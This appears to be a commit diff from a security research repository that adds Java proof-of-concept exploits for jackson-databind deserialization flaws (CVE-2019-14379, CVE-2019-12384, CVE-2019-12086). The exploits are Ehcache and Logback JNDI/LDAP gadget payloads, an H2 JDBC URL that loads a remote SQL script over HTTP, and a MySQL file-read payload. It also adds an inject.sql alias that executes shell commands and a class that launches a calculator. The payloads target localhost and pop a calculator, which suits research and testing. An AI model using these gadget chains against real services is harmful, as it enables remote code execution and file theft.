增加jackson部分payload测试，包括mysql的文件读取、h2 db的rce、logback的jndi以及ehcache的jndi

Author: xuanyh

pom.xml

@@ -51,7 +51,12 @@
     <dependency>
       <groupId>com.fasterxml.jackson.core</groupId>
       <artifactId>jackson-core</artifactId>
-      <version>2.6.3</version>
+      <version>2.9.8</version>
+    </dependency>
+    <dependency>
+      <groupId>com.fasterxml.jackson.core</groupId>
+      <artifactId>jackson-databind</artifactId>
+      <version>2.9.8</version>
     </dependency>
 
     <!-- ldap -->
@@ -78,7 +83,7 @@
     <dependency>
       <groupId>mysql</groupId>
       <artifactId>mysql-connector-java</artifactId>
-      <version>5.1.34</version>
+      <version>8.0.13</version>
     </dependency>
 
     <dependency>
@@ -97,6 +102,25 @@
       <version>6.2</version>
     </dependency>
 
+    <dependency>
+      <groupId>com.h2database</groupId>
+      <artifactId>h2</artifactId>
+      <version>1.4.199</version>
+    </dependency>
+
+    <dependency>
+      <groupId>net.sf.ehcache</groupId>
+      <artifactId>ehcache</artifactId>
+      <version>2.10.6</version>
+    </dependency>
+
+    <!-- Javaee API -->
+    <dependency>
+      <groupId>javax</groupId>
+      <artifactId>javaee-api</artifactId>
+      <version>6.0</version>
+    </dependency>
+
   </dependencies>
 
   <build>

src/main/java/Calc.java

@@ -1,16 +1,16 @@
-///**
-// * @author xuanyh
-// */
-//public class Calc {
-//  static {
-//    try {
-//      Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
-//    } catch (Throwable e) {
-//      e.printStackTrace();
-//    }
-//  }
-//
-//  public static void main(String[] args) {
-//
-//  }
-//}
+/**
+ * @author xuanyh
+ */
+public class Calc {
+  static {
+    try {
+      Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
+    } catch (Throwable e) {
+      e.printStackTrace();
+    }
+  }
+
+  public static void main(String[] args) {
+
+  }
+}

src/main/java/com/threedr3am/bug/jackson/EhcacheJndi.java

@@ -0,0 +1,32 @@
+package com.threedr3am.bug.jackson;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.server.LdapServer;
+import com.threedr3am.bug.server.RmiServer;
+import java.io.IOException;
+
+/**
+ * CVE-2019-14379
+ * jackson-databind RCE < 2.9.9.2
+ * @author xuanyh
+ */
+public class EhcacheJndi {
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+
+    String json = "[\"net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup\"," +
+        "{\"properties\":{\"jndiName\":\"ldap://localhost:43658/Calc\"}}]";
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+    Object o = mapper.readValue(json, Object.class);
+    mapper.writeValueAsString(o);
+
+  }
+}

src/main/java/com/threedr3am/bug/jackson/H2Rce.java

@@ -0,0 +1,22 @@
+package com.threedr3am.bug.jackson;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import java.io.IOException;
+
+/**
+ * CVE-2019-12384
+ * jackson-databind RCE < 2.9.9.2
+ * @author xuanyh
+ */
+public class H2Rce {
+  public static void main(String[] args) throws IOException {
+
+    ObjectMapper objectMapper = new ObjectMapper();
+    objectMapper.enableDefaultTyping();//开启 defaultTyping
+    //TODO 把resources文件inject.sql放到http服务器
+    String json = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", " +
+        "{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:80/inject.sql'\"}]";
+    Object o = objectMapper.readValue(json, Object.class);//反序列化对象
+    String s = objectMapper.writeValueAsString(o);//
+  }
+}

src/main/java/com/threedr3am/bug/jackson/LogbackJndi.java

@@ -0,0 +1,30 @@
+package com.threedr3am.bug.jackson;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.server.LdapServer;
+import com.threedr3am.bug.server.RmiServer;
+import java.io.IOException;
+
+/**
+ * logback jndi rce
+ * jackson < 2.9.9.2
+ * @author xuanyh
+ */
+public class LogbackJndi {
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+
+    String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\",{\"jndiLocation\":\"ldap://localhost:43658/Calc\"}]";
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+    Object o = mapper.readValue(json, Object.class);
+    mapper.writeValueAsString(o);
+  }
+}

src/main/java/com/threedr3am/bug/jackson/MysqlFileRead.java

@@ -0,0 +1,21 @@
+package com.threedr3am.bug.jackson;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import java.io.IOException;
+
+/**
+ * CVE-2019-12086
+ * jackson文件读取，2.x - 2.9.9，mysql < 8.0.14
+ * https://github.com/Gifts/Rogue-MySql-Server
+ * @author xuanyh
+ */
+public class MysqlFileRead {
+
+  public static void main(String[] args) throws IOException {
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+    //需要指定Rogue-MySql-Server地址
+    String json = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://127.0.0.1:3306/\"]";
+    mapper.readValue(json, Object.class);
+  }
+}

src/main/java/com/threedr3am/bug/jackson/package-info.java

@@ -0,0 +1,4 @@
+/**
+ * @author xuanyh
+ */
+package com.threedr3am.bug.jackson;

src/main/resources/inject.sql

@@ -0,0 +1,6 @@
+CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {
+String[] command = {cmd};
+Runtime.getRuntime().exec(command)
+}
+$$;
+CALL SHELLEXEC('/Applications/Calculator.app/Contents/MacOS/Calculator')